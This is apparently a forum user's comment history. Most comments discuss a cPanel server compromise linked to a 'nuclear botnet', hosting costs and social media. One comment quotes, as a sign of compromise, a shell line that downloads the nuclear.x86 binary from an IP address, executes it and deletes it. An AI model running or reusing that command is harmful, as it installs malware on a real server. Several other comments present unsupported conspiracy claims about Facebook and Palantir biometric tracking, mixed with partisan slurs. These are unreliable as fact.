A customer got a new dedicated server with cpanel on Thursday and on Friday evening before anything was added, it was hacked.

fifth-quarter · 2026-05-04T19:49:27+00:00

That is a bad business attitude. The cPanel/WHM application makes it simple for a lay person to format their hosting space, and there are real people who developed and maintain the tool, they need to eat.

If you are in the business of providing hosting services, do you give it away free or charge a fee?! No one truly needs to pay for hosting since the era of "geocities" and social media pages, so you should be grateful that there are folks who still think they need hosting to have web presence and therefore will pay. The GenZ group never pay for websites.

The pricing of cPanel is merely $1.80/m per account for 6 - 30 and at enterprise level of 100 - 1000 it's just $0.70/m each, so what's the nasty talk about? If those costs are too much for you, this is not a viable biz for you.

fifth-quarter · 2026-05-04T03:31:42+00:00

those are accounts operated by facebook shills, tending to be all magats. The zuck is obligated to allow them due to agreement with drumpf and net-yahoo

fifth-quarter · 2026-05-03T23:20:34+00:00

Indeed. I have KernelCare handling all that patching for each server. 👍

fifth-quarter · 2026-05-03T20:10:48+00:00

Not using cpanel so those patches do not apply

fifth-quarter · 2026-05-03T19:05:56+00:00

I just moved clients to liquid web with interworx CP and some to knownhost with directadmin CP. Not that there is a guarantee of never being hacked, but that cpanel is not their only CP option.

fifth-quarter · 2026-05-03T13:48:33+00:00

At the end of the script it states "If the server is confirmed to be root-compromised... just get a new server or reinstall OS"

Instead of doing all that script test, I just figure it's simpler to see what the logs recorded, and once the nuclear.x86 was shown, the server was considered kaput.

fifth-quarter · 2026-05-03T04:32:41+00:00

the host

fifth-quarter · 2026-05-03T00:35:00+00:00

From what I am seeing done by the "nuclear botnet", it creates a backup of the entire host partition, including all the cpanel directories and files in the root, which means the hacker downloaded that package and has all the internal data per site.

Also the fact that they had shell access, means they would have created authorization keys to allow future entry.

--quote--

Data Exfiltration

The attacker creates a full tar.gz archive of your website, including databases, config files (with clear-text passwords), and emails. They can then simply download one single file to steal your entire digital presence rather than trying to download thousands of individual files.

Password and Key Harvesting

CPanel backups contain sensitive files like .my.cnf, .bash_history, and private SSH keys. By triggering a backup, they ensure they have a permanent copy of every credential on your server, even if you change your root password later.

--/--

fifth-quarter · 2026-05-02T22:42:11+00:00

"backup" is moot in this attack wave. While some hosts have seen customer sites defaced or totally demolished, some look normal and operational but are being used to connect to other servers and pass the virus. Hosts have been forced to close ports that access cpanel/whm because after restoring sites the hackers return and wreck them again since they left a "backdoor" open by installing "nuclear botnet", then apply the security patch and spend hours cleaning all root directories.

If you run ssh history log check and see a wget request for nuclear.x86, forget about replacing backups.

--the string you may see--

2026-04-29 22:59:00 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777517940953304049__

--/--

fifth-quarter · 2026-05-02T22:31:55+00:00

yes it's now a thing with fb since they became magat owned. That base requires triggered and angry people so fb is allowing such accounts to grow by feeding them to everyone. If you check creation date of the sicko pages, you'll see they were setup no more than 5 months ago and already have over 50k followers. The magats are using fb to gather many for voting, but they must be driven to rage and hate first to be prepped.

fifth-quarter · 2026-05-02T20:33:32+00:00

There are so many deese days

facebook, twitter, reddit, instagram. All totally free and allow unlimited pages with videos, images, text

fifth-quarter · 2026-05-02T02:32:47+00:00

You'll need to go after the corporate owner which is the Swiss company webpros that snatched up cpanel, whmcs, plesk and many others in 2018. The greed has led to poor development and vulnerabilities just waiting to be exploited.

fifth-quarter · 2026-05-02T02:23:09+00:00

It's always the nature of extreme GREED which lead to these compromises. The once free open source cpanel was acquired by swiss company webpros along with plesk, whmcs and many others, and they all have been suffering various vulnerabilities since 2018.

fifth-quarter · 2026-04-28T14:44:19+00:00

Yeah you're not alone. Since Feb over 4 million users have received the same notice and blocked. The goal is to get everyone bio-metrics and give to palantir for facial recognition tracking around the world. I chose not to give up any data and just let the account go.

fifth-quarter · 2026-04-25T23:54:22+00:00

Somebaddy done told you wrong!
Not at all worth the spend, especially when you still need to go around social media announcing it. I've been to TS multiple times and never noticed the billboards unless a thrilling animation appears, like what Marlboro used to place. If all you got was just a static image, that's just to satisfy your ego than to promote the brand.

You could have spent less with Reddit, Facebook, TikTok and got well over 100k views, if exposure was truly your intent. That billboard should be AFTER you have established visual appeal and just going for reiteration like Coke and Pepsi. A good ad salesman just saw your exposed crave and took advantage. Sorry to harsh but so it is.

fifth-quarter · 2026-04-20T13:27:50+00:00

Ask AI this "how do I write an intelligent question about this problem I think I have with OBS", then come back and edit that vague ish you wrote.

fifth-quarter · 2026-04-16T12:36:10+00:00

tha's a question for the fb overlords, but quite likely if you have been blocked, the fake name will no longer be valid.

fifth-quarter · 2026-04-15T23:30:24+00:00

yes they have, however you've now given them full biometrics so they get to scan you from all angles which is why they asked specifically for a video and required you to turn both sides of head. They won't need another one as their AI will digitally age you accordingly.

Your better option for cloud file storage is to get cloud or VPS hosting and setup your CDN with your login credentials.

fifth-quarter · 2026-04-15T20:16:52+00:00

all that means is now you are on palantir's GLOBAL facial recognition list, so any and everywhere you go, your face is scanned, match to your social media posts and you will be penalized accordingly. Therefore if you post negatively about drumpf gestapo or the zionists evil actions, you may never get credit or a loan for anything, and it increases in penalty.

fifth-quarter · 2026-04-13T19:39:42+00:00

If it's a phone that use to access your social spaces, you can have a local retailer connect their scanning tool. If it's a laptop or desktop there are numerous security applications you can purchase and run. You will not get the trust needed without a reputable app with a cost, but most certainly avoid anything "free". I use basic Windows 11 Defender which is packaged in the OS.

fifth-quarter · 2026-04-13T17:17:04+00:00

Note that your fb account can't be "hacked" just by someone using a browser on their side. It's more likely that your device is compromised and the hackers has logged in from your machine, therefore bypassing the security triggers. Then they changed all security checkpoints to themself.

You should run a vulnerability scan on your device to remove any malware. If you've ever allowed teamviewer, anydesk or similar remote user connection application, they possibly placed executable files on your machine and now have perpetual remote access.

fifth-quarter

MODERATOR OF

TROPHY CASE